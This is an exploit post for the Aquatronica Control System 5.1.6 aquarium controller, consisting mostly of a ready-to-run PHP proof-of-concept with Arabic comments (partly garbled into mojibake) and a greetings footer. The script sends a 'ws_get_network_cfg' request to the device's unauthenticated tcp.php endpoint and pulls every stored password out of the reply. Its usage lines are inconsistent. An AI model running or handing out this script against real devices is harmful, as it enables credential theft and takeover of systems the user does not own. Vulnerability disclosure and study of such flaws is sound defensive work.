============================================================================================================================================= | # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) | | # Vendor : https://www.aquatronica.com | ============================================================================================================================================= poc : [+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint [+] save as poc.php [+] Usage : C:\www\test>php 3.php poc.php [+] payload : <?php // التأكد من ØªÙˆØ§ÙØ± الوسائط المطلوبة if ($argc != 2) { echo "Usage: php aqua.php\n"; exit(1); } $ip = $argv[1]; $program = "TCP"; $command = "ws_get_network_cfg"; $function_id = "TCP_XML_REQUEST"; // إنشاء عنوان URL لنقطة النهاية tcp.php $url = "http://$ip/" . strtolower($program) . ".php"; // البيانات التي سيتم إرسالها ÙÙŠ الطلب POST $post_data = [ 'function_id' => strtolower($function_id), 'command' => strtoupper($command) ]; // إرسال الطلب باستخدام cURL $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200) { // ÙÙƒ تشÙير النصوص والإشارة المرجعية $decoded_response = urldecode($response); $final_response = htmlspecialchars_decode($decoded_response); // Ø§Ù„Ø¨ØØ« عن كلمات المرور باستخدام التعبيرات النمطية preg_match_all('/pwd="([^"]+)"/', $final_response, $matches); if (!empty($matches[1])) { foreach ($matches[1] as $password) { echo " $password\n"; sleep(1); // تأخير زمني بين الكلمات } } else { echo "No passwords found.\n"; } } else { echo "Dry season! HTTP Code: $http_code\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================